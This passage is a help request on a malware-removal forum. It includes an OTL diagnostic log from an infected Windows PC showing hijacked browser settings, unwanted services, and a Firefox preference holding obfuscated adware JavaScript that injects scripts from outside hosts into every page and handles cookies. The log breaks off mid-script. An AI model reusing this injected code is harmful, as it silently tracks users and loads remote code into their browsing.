WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. Join 93084 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!

Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Malwarebytes and Norton disappeared, cannot reinstall MBAM or HijackTh

Started by NikJ92 , May 31 2014 12:10 AM

This topic is locked

3 replies to this topic

#1 NikJ92

Authentic Member

Authentic Member
69 posts

Posted 31 May 2014 - 12:10 AM

I'll preface this by saying this isn't my computer, at least not in the past year. Two preteens (my siblings) have been consistently downloading hacking tools and lord knows what else for the past year. Now Malwarebytes, Norton Security Suite and HijackThis (probably other programs; I can't even tell anymore) have disappeared and can't be reinstalled.

The computer's performance is also unbelievably slow. OTL was the only program I could run since it just runs straight from the downloadable file. These are two of the errors I got when trying to reinstall Malwarebytes:http://imgur.com/a/QLJBH Malwarebytes still has a folder in Program Files (x86), but it's locked and says I don't have permission to delete, access or run any files from it. Here are the OTL logs. Extras will be in a reply because I get an error when I try to put both.

Edit: Forgot to mention that Malwarebytes doesn't appear in Add/Remove programs anymore, either.

== OTL.txt ==

OTL logfile created on: 5/30/2014 11:12:02 - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Owner\Desktop

64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.11.9600.17041)

Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

7.99 Gb Total Physical Memory | 7.18 Gb Available Physical Memory | 89.90% Memory free

15.98 Gb Paging File | 15.19 Gb Available in Paging File | 95.05% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 917.83 Gb Total Space | 133.70 Gb Free Space | 14.57% Space Free | Partition Type: NTFS

Drive D: | 13.68 Gb Total Space | 1.92 Gb Free Space | 14.07% Space Free | Partition Type: NTFS

Drive K: | 1.86 Gb Total Space | 0.01 Gb Free Space | 0.32% Space Free | Partition Type: FAT32

Computer Name: OWNER-PC | User Name: Owner | Logged in as Administrator.

Boot Mode: SafeMode | Scan Mode: Current user | Include 64bit Scans

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - C:\Users\Owner\Desktop\OTL.exe (OldTimer Tools)

PRC - C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)

PRC - C:\Windows\SysWOW64\Windows Server\wserver.exe ()

========== Modules (No Company Name) ==========

========== Services (SafeList) ==========

SRV:64bit: - (!SASCORE) -- C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE File not found

SRV:64bit: - (HitmanProScheduler) -- C:\Program Files\HitmanPro\hmpsched.exe (SurfRight B.V.)

SRV:64bit: - (IEEtwCollectorService) -- C:\Windows\SysNative\IEEtwCollector.exe (Microsoft Corporation)

SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)

SRV:64bit: - (tvnserver) -- C:\Program Files\TightVNC\tvnserver.exe (GlavSoft LLC.)

SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Acresso Software Inc.)

SRV:64bit: - (1a34a8e0) -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)

SRV - (PnkBstrA) -- C:\Windows\SysWOW64\PnkBstrA.exe ()

SRV - (CltMngSvc) -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe (Client Connect LTD)

SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)

SRV - (Hamachi2Svc) -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe (LogMeIn Inc.)

SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)

SRV - (LMIGuardianSvc) -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe (LogMeIn, Inc.)

SRV - (ASD2Svc) -- C:\Program Files (x86)\Anvisoft\Anvi Smart Defender\ASD2Srv.exe ()

SRV - (Apache2.4) -- C:\xampp\apache\bin\httpd.exe (Apache Software Foundation)

SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)

SRV - (AnviCsbSvc) -- C:\Program Files (x86)\Anvisoft\Cloud System Booster\CSBSvc.exe (Anvisoft)

SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)

SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)

SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)

SRV - (CodeMeter.exe) -- C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe (WIBU-SYSTEMS AG)

SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)

SRV - (FileZillaServer) -- C:\xampp\FileZillaFTP\FileZillaServer.exe (FileZilla Project)

SRV - (IAStorDataMgrSvc) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation)

SRV - (GamesAppService) -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe (WildTangent, Inc.)

SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Acresso Software Inc.)

SRV - (ACDaemon) -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)

SRV - (FirebirdGuardianDefaultInstance) -- C:\Program Files (x86)\Firebird\Firebird_2_1\bin\fbguard.exe (Firebird Project)

SRV - (FirebirdServerDefaultInstance) -- C:\Program Files (x86)\Firebird\Firebird_2_1\bin\fbserver.exe (Firebird Project)

SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)

SRV - (USBSafelyRemoveService) -- C:\Program Files (x86)\USB Safely Remove\USBSRService.exe ()

SRV - (Adobe Version Cue CS4) -- C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe (Adobe Systems Incorporated)

========== Driver Services (SafeList) ==========

DRV:64bit: - (hitmanpro37) -- C:\Windows\SysNative\drivers\hitmanpro37.sys ()

DRV:64bit: - (MBAMSwissArmy) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys (Malwarebytes Corporation)

DRV:64bit: - (AVGIDSDriver) -- C:\Windows\SysNative\drivers\avgidsdrivera.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (Avgtdia) -- C:\Windows\SysNative\drivers\avgtdia.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (Avgmfx64) -- C:\Windows\SysNative\drivers\avgmfx64.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (AVGIDSHA) -- C:\Windows\SysNative\drivers\avgidsha.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (Avgdiska) -- C:\Windows\SysNative\drivers\avgdiska.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (Avgldx64) -- C:\Windows\SysNative\drivers\avgldx64.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (Avgloga) -- C:\Windows\SysNative\drivers\avgloga.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (Avgrkx64) -- C:\Windows\SysNative\drivers\avgrkx64.sys (AVG Technologies CZ, s.r.o.)

DRV:64bit: - (asd2fsm) -- C:\Windows\SysNative\drivers\asd2fsm.sys (Anvisoft)

DRV:64bit: - (taphss6) -- C:\Windows\SysNative\drivers\taphss6.sys (Anchorfree Inc.)

DRV:64bit: - (ssudmdm) -- C:\Windows\SysNative\drivers\ssudmdm.sys (DEVGURU Co., LTD.(www.devguru.co.kr))

DRV:64bit: - (dg_ssudbus) -- C:\Windows\SysNative\drivers\ssudbus.sys (DEVGURU Co., LTD.(www.devguru.co.kr))

DRV:64bit: - (SymEvent) -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS (Symantec Corporation)

DRV:64bit: - (SymEFA) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symefa64.sys (Symantec Corporation)

DRV:64bit: - (SymDS) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symds64.sys (Symantec Corporation)

DRV:64bit: - (SRTSP) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\srtsp64.sys (Symantec Corporation)

DRV:64bit: - (SymNetS) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symnets.sys (Symantec Corporation)

DRV:64bit: - (ccSet_N360) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\ccsetx64.sys (Symantec Corporation)

DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)

DRV:64bit: - (SRTSPX) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\srtspx64.sys (Symantec Corporation)

DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)

DRV:64bit: - (ScreamBAudioSvc) -- C:\Windows\SysNative\drivers\ScreamingBAudio64.sys (Screaming Bee LLC)

DRV:64bit: - (atikmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (Advanced Micro Devices, Inc.)

DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (Advanced Micro Devices, Inc.)

DRV:64bit: - (SymIRON) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\ironx64.sys (Symantec Corporation)

DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)

DRV:64bit: - (tenCapture) -- C:\Windows\SysNative\drivers\tenCapture.sys (Hajo Krabbenhöft)

DRV:64bit: - (athr) -- C:\Windows\SysNative\drivers\athrx.sys (Qualcomm Atheros Communications, Inc.)

DRV:64bit: - (taphss) -- C:\Windows\SysNative\drivers\taphss.sys (AnchorFree Inc)

DRV:64bit: - (AtiHDAudioService) -- C:\Windows\SysNative\drivers\AtihdW76.sys (Advanced Micro Devices)

DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)

DRV:64bit: - (mcaudrv_simple) -- C:\Windows\SysNative\drivers\mcaudrv_x64.sys (ManyCam LLC)

DRV:64bit: - (ManyCam) -- C:\Windows\SysNative\drivers\mcvidrv_x64.sys (ManyCam LLC)

DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)

DRV:64bit: - (RsFx0105) -- C:\Windows\SysNative\drivers\RsFx0105.sys (Microsoft Corporation)

DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)

DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)

DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)

DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)

DRV:64bit: - (iaStor) -- C:\Windows\SysNative\drivers\iaStor.sys (Intel Corporation)

DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek )

DRV:64bit: - (sptd) -- C:\Windows\SysNative\drivers\sptd.sys (Duplex Secure Ltd.)

DRV:64bit: - (AtiHdmiService) -- C:\Windows\SysNative\drivers\AtiHdmi.sys (ATI Technologies, Inc.)

DRV:64bit: - (PxHlpa64) -- C:\Windows\SysNative\drivers\PxHlpa64.sys (Sonic Solutions)

DRV:64bit: - (mfeavfk) -- C:\Windows\SysNative\drivers\mfeavfk.sys (McAfee, Inc.)

DRV:64bit: - (mfesmfk) -- C:\Windows\SysNative\drivers\mfesmfk.sys (McAfee, Inc.)

DRV:64bit: - (mferkdk) -- C:\Windows\SysNative\drivers\mferkdk.sys (McAfee, Inc.)

DRV:64bit: - (mfehidk) -- C:\Windows\SysNative\drivers\mfehidk.sys (McAfee, Inc.)

DRV:64bit: - (igfx) -- C:\Windows\SysNative\drivers\igdkmd64.sys (Intel Corporation)

DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)

DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)

DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)

DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)

DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)

DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)

DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)

DRV:64bit: - (hamachi) -- C:\Windows\SysNative\drivers\hamachi.sys (LogMeIn, Inc.)

DRV:64bit: - (RTL8169) -- C:\Windows\SysNative\drivers\Rtlh64.sys (Realtek Corporation )

DRV:64bit: - (ENTECH64) -- C:\Windows\SysNative\drivers\Entech64.sys (EnTech Taiwan)

DRV:64bit: - (adfs) -- C:\Windows\SysNative\drivers\adfs.sys (Adobe Systems, Inc.)

DRV:64bit: - (UsbFltr) -- C:\Windows\SysNative\drivers\UsbFltr.sys (Waytech Development, Inc.)

DRV - (NAVEX15) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\VirusDefs\20131130.007\EX64.SYS (Symantec Corporation)

DRV - (eeCtrl) -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys (Symantec Corporation)

DRV - (NAVENG) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\VirusDefs\20131130.007\ENG64.SYS (Symantec Corporation)

DRV - (IDSVia64) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\IPSDefs\20131128.001\IDSvia64.sys (Symantec Corporation)

DRV - (BHDrvx64) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\BASHDefs\20131114.001\BHDrvx64.sys (Symantec Corporation)

DRV - (CEDRIVER60) -- C:\Program Files (x86)\Cheat Engine 6.3\dbk64.sys ()

DRV - (XFDriver64) -- C:\Program Files (x86)\Xfire2\XFDriver64.sys (XFire)

DRV - (Normandy) -- C:\Windows\SysWow64\drivers\Normandy.sys ()

DRV - (cpudrv64) -- C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys ()

DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)

DRV - (adfs) -- C:\Windows\SysWow64\drivers\adfs.sys (Adobe Systems, Inc.)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD20}

IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC

IE:64bit: - HKLM\..\SearchScopes\{34D89E8B-3BF8-4591-ACE1-BFCC24ACC745}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpd

IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD20}: "URL" = http://isearch.fanta...q={searchTerms}

IE:64bit: - HKLM\..\SearchScopes\{AB52EDAA-AF1A-4031-A9EB-9F255A937C16}: "URL" = http://search.live.c...ms}&FORM=HPDTDF

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = about:blank

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://websearch.fas...&cc=US&unqvl=55

IE - HKLM\..\SearchScopes,DefaultScope = {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}

IE - HKLM\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = http://feed.snapdo.c...q={searchTerms}

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC

IE - HKLM\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.fas...&cc=US&unqvl=55

IE - HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = about:blank

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.condui...A8F1137B3&SSPV=

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKCU\..\SearchScopes,DefaultScope = {006ee092-9658-4fd6-bd8e-a21a348e59f5}

IE - HKCU\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = http://feed.snapdo.c...q={searchTerms}

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = 127.0.0.1;localhost;10.*;192.168.*;127.0.0.1:895;127.0.0.1:896;<local>

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = http=127.0.0.1:8555;https=127.0.0.1:8555

========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename,S: S", "WebSearch"

FF - prefs.js..browser.search.defaulturl: "http://websearch.fas...nqvl=55&l=1&q="

FF - prefs.js..browser.search.order.1: "WebSearch"

FF - prefs.js..browser.search.order.1,S: S", "WebSearch"

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.selectedEngine,S: S", "WebSearch"

FF - prefs.js..browser.search.suggest.enabled: false

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..browser.startup.homepage: "http://www.trovi.com...8F1137B3&SSPV="

FF - prefs.js..extensions.1pSpmomrG.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1){return}}catch(e){};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1063/l.js?aoi=1311798366&pid=1063&zoneid=15224';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=315_2405&hid=17411091879117559275';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.dataf...091879117559275\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=413603&ext=save%20on&systemid=17411091879117559275\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=413603&ext=save%20on&systemid=17411091879117559275\":\"//asrv-a.akamaihd.net/sd/1018/1005.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=2';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c, B){if( B){var g=new Date;g.setTime(g.getTime()+864E5* B);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length); if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function( B){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c, B){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent( B);this.xhr.send( B)}};a.waitForTokens={};a.addScript=function(a, B){if(\"bing\"== B){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a, B){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function( B){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a, B){return window.getComputedStyle(a, B)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch( B){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild( B);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a, B){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)}, B)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a= parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url= function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var 